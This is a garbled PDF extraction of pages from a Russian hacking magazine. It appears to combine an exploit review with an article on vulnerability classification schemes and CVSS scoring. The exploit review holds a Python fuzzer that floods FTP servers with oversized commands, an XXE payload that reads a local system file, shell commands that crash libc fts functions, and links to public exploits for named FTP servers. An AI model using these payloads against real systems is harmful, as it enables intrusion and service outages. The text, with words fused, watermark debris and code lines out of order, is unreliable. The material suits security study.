Устройствосамогофаззераможнопонятьнапростомпримере. Воспользуемсявспомогательнымсредствомantiparser (antiparser. sourceforge.net) — этоAPI, котороенаписанонаPython ипозволяет создатьспециальныеблокиданныхдляприменениявфаззерах. Что жепредставляютсобойэтиблоки?

apChar() — восьмибитный символ

apCString() — строка (как в языке С), состоящая из знаков и заканчивающаяся нулевым символом

apKeywords() — список параметров, отделенных друг от

044

XÀÊÅÐ 04 /124/ 09

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

обзор

обзор

обзор

эксплоитов

эксплоитов

эксплоитов

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

>> взломw Click

 

BUY

 

 

to

 

 

 

 

m

обзор

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

эксплоитов

 

w

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

СхемаработыFTP-протокола

друга специальным символом или другим блоком данных apLong() — 32-битное целое

apShort() — 16-битное целое

apString() — произвольная строка (aka «free form string»)

НаиболееинтересентипapKeywords(). Последовательность, задаваемаяимвыглядиттак: [ключевоеслово(например, командаFTP)] [разделитель][блокданных(параметрыккоманде)][символконца блока]. ПрименительнокFTP можносделатьтакойнабросок:

#импортируем все функции из модуля From antiparser import *

#задаем список команд в качестве ключевых слов типа список

CMDLIST = ['ABOR', ‘ALLO', 'APPE', 'CDUP', 'XCUP', 'CWD', 'XCWD', 'DELE', 'HELP', 'LIST', 'MKD', 'XMKD', 'MACB’, 'MODE', 'MTMD', 'NLST', 'NOOP', 'PASS', ‘PASV', 'PORT', 'PWD', 'XPWD', 'QUIT', 'REIN', 'RETR', 'RMD', 'XRMD', 'REST', 'RNFR', 'RNTO', 'SITE', 'SIZE', 'STAT’, 'STOR', 'STRU', 'STOU', 'SYST', 'TYPE', 'USER']

#задаем символ разделителя и завершающего знака SEPARATOR = ""

TERMINATOR = "\r\n" for cmd in CMDLIST:

#инициализируем API

 

 

 

Ap = antiparser()

БазаопкодовMetasploit

# настраиваем на режим со своими ключевыми словами

 

 

cmdkw = apKeywords()

 

 

# задаем слова, разделитель и завершающий символ

cmdkw.setContent(r»%n%n%n%n%n%n%n%n%n%n%n%»)

cmdkw.setKeywords([cmd])

# делаем так, чтобы генерируемые блоки данных варьирова-

cmdkw.setSeparator(SEPARATOR)

лись по размеру с нарастанием до 65536 байт

cmdkw.setTerminator(TERMINATOR)

cmdkw.setMode('incremental')

# чем будем фаззить, в качестве параметров к командам

cmdkw.setMaxSize(65536)

 

 

 

XÀÊÅÐ 04 /124/ 09

045

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>m

 

 

 

 

 

 

to

 

 

 

взлом

w Click

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

d

f

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

обзор

обзор

эксплоитов

эксплоитов

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

обзор

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

m

 

w Click

 

 

 

 

 

 

эксплоитов

 

 

 

 

 

o

 

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

03 NEXTAPP ECHO XML INJECTION

Спомощьютакихинструментов, какHttp-Analyzer илиплагинкMozilla

Tamper Data, оченьудобнопроводитьатакиназаголовки

ap.append(cmdkw)

# шлем всю картину на указанный хост и порт с помощью сокетов

sock = apSocket() sock.connect(HOST, PORT) print sock.recv(1024) sock.sendTCP(ap.getPayload()) print sock.recv(1024) sock.close

Отмеченывседоступныеметодыдля«общения». Тестированиевыявило затрудненияприобработкеCWD/CDUP. «Access violation» представляет ситуацию, когдаприложениепытаетсяпрочитатьучастокпамяти, которого несуществует(характернаяошибка— «Read of»). Втораяошибкасвязана сзаписьювучастокпамяти(«Write to») , которыйбылнедоступен, либо приложениенеимелопривилегийдлязаписи. Дляотслеживаниятакого родаошибоктребуетсявыставитьфлажкивOllyDbg (Options ÆDebugging

ÆOptions ÆExceptions) «Memory Access Violation», «Single Step Break».

>>Targets

Выявленныетакимспособомуязвимости:

• WinFTP 2.3.0

ПередачааномальногопараметравкомандеLIST (LIST *<строка>). Поз-

воляетперезаписатьarbitary-память(http://milw0rm.com/exploits/7875).

• GuildFTPd FTP Server Version 0.x.x

ОбходограничениябезопасностипокомандеDELETE (http://milw0rm. com/exploits/8200).

Можетбытьосуществленосприменениемтехникdirectory traversal ( \..).

• WFTPD Explorer Pro 1.0

Переполнениекучи(http://milw0rm.com/exploits/7913).

• Serv-U 7.4.0.1

Неавторизированноесозданиепроизвольныхдиректорий(http:// milw0rm.com/exploits/8211).

Вдобавок, следует понимать, что неразумное использование экстремально больших параметров иногда приводит к отказу в обслуживании сервиса. Этот продукт, к сожалению, не исключение. При сообщении большого числа (свыше 2000) команд SMNT после авторизации — происходит аварийное завершение работы сервиса.

>> Brief:

Однаизнеочевидныхиинтересныхатак. Примерсценария: отклиен- таотправляютсяXML-данные, поступаютнасторонуприложения, где обрабатываютсяXML-парсером.

Типичныйзапрос:

<client-message xmlns=»http://www.nextapp. com/products/echo2/climsg» trans-id=»3» focus=»c_25»><message-part xmlns=»» processor=»E choPropertyUpdate»><property component-id=»c_25» name=»text»>aa</property><property componentid=»c_25» name=»horizontalScroll» value=»0»/><property component-id=»c_25» name=»verticalScroll» value=»0»/></message-part><message-part xmlns=»» processor=»EchoAction»><action component-id=»c_25» name=»action»/></message-part></client-message>

Вредоносныйзапрос:

<?xml version=»1.0»?><!DOCTYPE sec [<!ELEMENT sec ANY><!ENTITY mytestentity SYSTEM "file:///c:\boot. ini">]>

Интересностьвтом, чтоязыковымисредствамиязыкаXML злоумышленникможетпродекларироватьновыйобъект. Тот, всвоюочередь, объявитобъект, содержащийboot.ini, накоторыйможнобудетсослать- сявXML-запросе.

>> Targets

NextApp Echo < 2.1.1

>> Exploits http://milw0rm.com/exploits/8191

Кодзапросапредставленвыше, инжекттакогоXML-request’a может бытьвыполненспомощьюсредствJS/HTTP-POST.

04 УЯЗВИМОСТИВФУНКЦИЯХFTS_*

ВLIBC (HTTP://MILW0RM.COM/ EXPLOITS/8163).

Здесьмывидимнекорректнуюобработкуисключительныхситуаций придлинномпути. Наборфункцийfts занимаетсяотображением иерархиифайловойсистемыUNIX — ftp_open() возвращаетхэндлна файловуюиерархию, ионможетбыть«скормлен» однойизследующих функций:

fts_read — возвращаетуказательнаструктуру, описывающуюодин изэлементовфайловойиерархии;

fts_children() возвращаетуказательнасписокструктур, каждаяиз которыхописываетодинизфайловвнутридочернейдиректории. Обратимсякструктуре, описывающейиерархию:

typedef struct _ftsent {

unsigned short fts_info; /* флаги на FTSENT-структуру*/ char *fts_accpath; /* путь доступа */

char *fts_path; /* текущий каталог */ size_t fts_pathlen; /* strlen(fts_path) */ char *fts_name; /* имя файла */

size_t fts_namelen; /* strlen(fts_name) */ short fts_level; /* глубина иерархии (-1 äî N) */

046

XÀÊÅÐ 04 /124/ 09

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

обзор

обзор

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

o

эксплоитов

эксплоитов

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

int fts_errno; /* исключения */

long fts_number; /* нумерованное значение */ void *fts_pointer; /* локальный адрес в памяти */

struct _ftsent *fts_parent; /* родительская директория */

struct _ftsent *fts_link; /* следующая файловая структура */

struct _ftsent *fts_cycle; /* структура иерархии по циклу */

struct stat *fts_statp; /* статистика по файлам иерархии */

} FTSENT;

Заметим, чтоfts_level имееттипshort. Этонаводитнаопределенныемысли. Приизучениикодавзгляднатыкаетсянакомментарийразработчиков:

- ---line-616-625---

/*

*Figure out the max file name length that can be stored in the

*current path -- the inner loop allocates more path as necessary.

*We really wouldn’t have to do the maxlen calculations here, we

*could do them in fts_read before returning the path, but it’s a

*lot easier here since the length is part of the dirent structure.

*If not changing directories set a pointer so that can just append

*each new name into the path.

*/

- ---line-616-625---

«Поправдеговоря, мынебудемздесьделатькакие-либовы- числениясогромнымиименами... издесьдолженбытьуровень ограниченийили«pathlen»-монитор». Конечно, должен, ногде жеон? Безусловно, недоработка, аточнеенедоделка.

#define NAPPEND(p)\ (p->fts_path[p->fts_pathlen — 1] == ‘/’ \

? p->fts_pathlen — 1 : p->fts_pathlen)

Естественно, этафункцияпойдетвкреш, еслимыобратимсякнеправильномуучасткупамятиспомощьюаномальныхпараметров.

127# pwd /home/cxib

# количество родительских каталогов очень велико 127# du /home/

4 /home/cxib/.ssh Segmentation fault (core dumped) 127# rm -rf Samotnosc Segmentation fault (core dumped) 127# chmod -R 000 Samotnosc Segmentation fault (core dumped)

>>Targets

OpenBSD 4.4 (/usr/src/lib/libc/gen/fts.c)

Microsoft Interix 6.0 10.0.6030.0 x86

Microsft Vista Enterprise (SearchIndexer.exe) z

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

XÀÊÅÐ 04 /124/ 09

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>

w

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

взлом

BID

Secunia

 

OSVDB

АНДРЕЙ «SKVZ» КОМАРОВ / KOMAROV@ITDEFENCE.RU /

МЕРЯЕМ

ISS X-Force

 

УЯЗВИМОСТИ

 

КЛАССИФИКАТОРЫИМЕТРИКИКОМПЬЮТЕРНЫХБРЕШЕЙ

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Ежедневно сотнями хакеров обнаруживаются тысячи уязвимостей, — после чего взламывается куча сайтов, и детали багов выкладываются в багтрак на всеобщее обозрение. Наверняка, ты читал подобные обзоры и замечал, что каждый баг определенным образом классифицируется. Что собой представляет измерение уязвимости, по каким критериям производится и на кой черт это вообще нужно знать? Ответы ты найдешь в этой статье.

>> взлом

«Общепринятыхсистемпоклассификации брешейвнашейстраненесуществует» — эту фразуяпоставлювоглавуугла. Продвинутым государствомвэтомпланесталиСША. Там ведутнесколькоклассификацийиактивноиспользуютихкаквобразовательномпроцессе, такивтехнологиях. Однойизсамыхизвестных системклассификацииявляетсяCVE, которая курируетсякомпаниейNCSD (National Cyber Security Division) приодномизМинистерств США. Рассмотримэтусистемуподробнее.

СVE (COMMON VULNERABILITIES AND EXPOSURES) Посути, CVE — это«словарь» известныхуязвимостей, имеющийстрогуюхарактеристику поописательнымкритериям, чтоотличаетего, скажем, отBugtrack-ленты. ПолностьюCVE можноотыскать вНациональнойБазеУязвимостейСША(NVD — nvd.nist.gov) илинаофициальномсайте(cve.mitre.org/data/downloads). Причем, распространяетсябазавнескольких

форматах: xml, html, csf, xsd schema. Из-за такойдоступности, открытостииудобствак базеCVE частообращаютсясамиразработчики различногоПО(впервуюочередь, нацеленного нарынокинформационнойбезопасности). ОбщийвидзаписиCVE выглядитпримернотак:

CVE ID, Reference è Description.

ID записываетсясуказаниемкодаипорядковогономера, например«CVE-1999-03». Вполе Reference записываютсяразличногорода ссылкинапатчи, рекомендательногорода документыиликомментарииразработчика. Description отвечаетзаописаниесамойуязвимости. Короче, CVE — системаширокогопрофиляиникоимобразомнесосредотачивается тольконаклиентскихуязвимостяхили, скажем, исключительнонаWEB-протоколе. Изначальнооназадумываласькакединыйстандарт идентификацииуязвимостей, которыйдолжен охватыватьнесколькозвеньевинформацион-

нойсистемы: системупоискаиобнаружения брешей(например, сканербезопасности), антивирусноеПО, атакжеисследуемоеПО. Как появиласьидеяеесоздания? Многиекомпаниизанимаютсяпоискомбрешейвразличных продуктахнаосновеполитики(не)разглашения информацииивзаимодействияспроизводителями. Как-то, приисследованииодногоиз продуктовдесятьюразличнымикомпаниями, однойитойжеуязвимостибылиприсвоены абсолютноразныеназвания. Послевыявления сейвопиющейнесправедливостибылопринято соглашениеоединомстандарте. ТогдажекомпанияMITRE Corporation (mitre.org) предложиларешение, независимоеотразличныхпроизводителейсредствпоискауязвимостей, ивзяла насебяответственностьзаеговоплощение. Нельзясказать, чтопослеэтоговсебагистали упорядоченными. Разработчикипродолжают активноразвиватьсамостоятельныеначинания. Частьизнихимеютплатнуюподписку, и антивирусныекомпаниичастенькообращаются

048

XÀÊÅÐ 04 /124/

09

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

BID

OSVDB

Secunia

>>

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

взломw

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

книмидобавляютсоответствующиесигнатуры

всвоипродукты. Стоимостьтакойгодовойподпискисоставляетоколо$5000 ивыше.

BID

ЭтаклассификацияприсутствуетисключительнонапорталеSecurityfocus (используетсяв лентеsecurityfocus.com/vulnerabilities). Одна изотличительныхособенностейBID — совместимостьсCVE. Условноговоря, найденная уязвимостьвBID имеетссылкунаномерCVE и, соответственно, равнозначнапоинформации. Усистемыестьрядописательныхсвойств— например, класс, возможностьлокальногоили удаленногоисполненияит.п. Вбудущемты убедишься, чтоэтихпараметровнедостаточно дляполнойхарактеристики, но, темнеменее, BID даетразработчикувполненаглядную информациюовыявленнойбреши.

OSVDB

Названиерасшифровываетсяпримернокак: «Открытаябазаданныхуязвимостей». Все простоисовкусом. Классификациясоздана тремянекоммерческимиорганизациями. Двести волонтеровсовсегомираактивноучаствуютв еенаполнении. Средипрочегоприсутствуют: локацияэксплуатации(сетевойдоступ/локальныйдоступ) иимпакт(ущерботуязвимости, воздействиенакакую-либочастьцелевой информационнойсистемы).

SECUNIA

ужезаработаласебедостаточнославы. Не сказать, чтобыихпорталвнескакую-тоособую, добавочнуюклассификацию, ноименноон предлагаетуслугиплатнойподпискинабазу уязвимостей.

ISS X-FORCE

ISS затрагиваетвсеперечисленныевышекритерии, новдобавокописываетбизнес-импакт, аименно— материальныйущерб, который можетповлечьзасобойугрозаэксплуата-

ции. Например, баг«Microsoft Excel Remote Code Execution», нацеленныйнакомпьютер сотрудникабанкаилипредприятия, способен привестиккражеважныхдокументов, ущерб отразглашениякоторыхможетисчисляться миллионами. Оценитьуронотразличных видоватакможно, ознакомившисьсодним изведущихблоговврусскоязычномсегмен-

теоsecurity-бричахиутечках— Perimetrix (securitylab.ru/blog/company/Perimetrix_blog).

Такжевсистемеприсутствуеткачественно новаячерта— переходкметрикамбезопасностидляописаниясвойствуязвимости. Для этогоиспользуетсяобщаясистемаподсчета рисковуязвимостейCVSS версии2. Она представляетсобойшкалы, наосновекоторых выставляютсябаллы. Системаметрикбыла придуманадляразделенияприоритетовнад исправлениемуязвимостей. Каждаяшкала

относитсякопределенномусмысловомуразделу, которыйназываетсяметрикой. ВCVSS v.2 ихтри: базоваяметрика, временнаяметрика иконтекстнаяметрика. Хакеровзаинтересует толькопервая.

БАЗОВАЯМЕТРИКА

Нередконасолидныхпорталахпобезопасностиможноувидетьфразу— «CVSS Base Score = 9.2». Какэтопонимать? Параметрвычисляется поспециальнойформуле:

BaseScore = round_to_1_decimal((( 0.6*Impact)+(0.4*Exploitability)- 1.5)*f(Impact))

— плюсещенесколько. Всеэтиформулыможно найтипоадресуfirst.org/cvss. Чтобы все стало понятнее, рассмотрим пример. Задан вектор уязвимости базовой метрики вида: «AV:N/ AC:L/Au:N/C:N/I:N/A:C». Все красуется на странице описания, но ты абсолютно не можешь расшифровать эти иероглифы! Я тебе помогу. Итак, расшифровываем по порядку.

AccessVector:Network — возможностьдоступа кобъектуисключительночерезсеть. Дляэксплуатацииуязвимостизлоумышленникдолжен обладатьдоступомкуязвимомуПО, причемэтот доступограничентольковеличинойсетевогостека. Локальногодоступаилидоступаиз

Этадатскаякомпания, лентауязвимостей которойдоступнапоадресуsecunia.com,

Недокументированные

уязвимости

Внастоящеевремяэкспертымозгуютнадвключениемвектора «недокументированныеуязвимости» воднуизметрик. Этотпараметримеетвысокоезначение. Внедалекомбудущеммысможем лицезретьстрокуundercover vulnerabilities — «вероятно, возможныекисполнению». Насайте, посвященномразвитиюметрик информационнойбезопасности(securitymetrics.org/content/Wiki. jsp), вывешенопубличноеобращениепоповодутого, какикаким образомисчислятьэтотпараметр. Всежелающиемогутотправить тудасвоипредложения.

Политика разглашения информации об уязвимости

Этосоглашениеимеетряднюансов. Например, хакер, обнаружив уязвимость, ищетконтакты, чтобынаправитьсоответствующий запроспроизводителю. Еслипоистечениипятиднейпроизводитель отмалчивается, вводитвзаблуждениесвоихпользователейкакимитоспособамиилинекорректновступаетвдиалог, тоемуотправляется повторноеписьмо. Выжидаютсяещепятьрабочихдней, послечего баг-хантервправепомещатьописаниеобагенасобственномресурсе иливпубличныебагтраки. Приэтомвписьметребуетсяоговоритьи согласоватьдатупубликации, чтобыпроизводительуспелвыпустить обновлениеилисоветыпозащитеотэксплуатации. Важноотметить, чтоеслистороннеетретьелицоопубликовалоданныеобэксплуатациинайденнойтобойуязвимости, тыможешьсмелопоститьее подробностибезсогласованияскем-либо. Воттакаяарифметика.

XÀÊÅÐ 04 /124/ 09

049

 

Соседние файлы в папке журнал хакер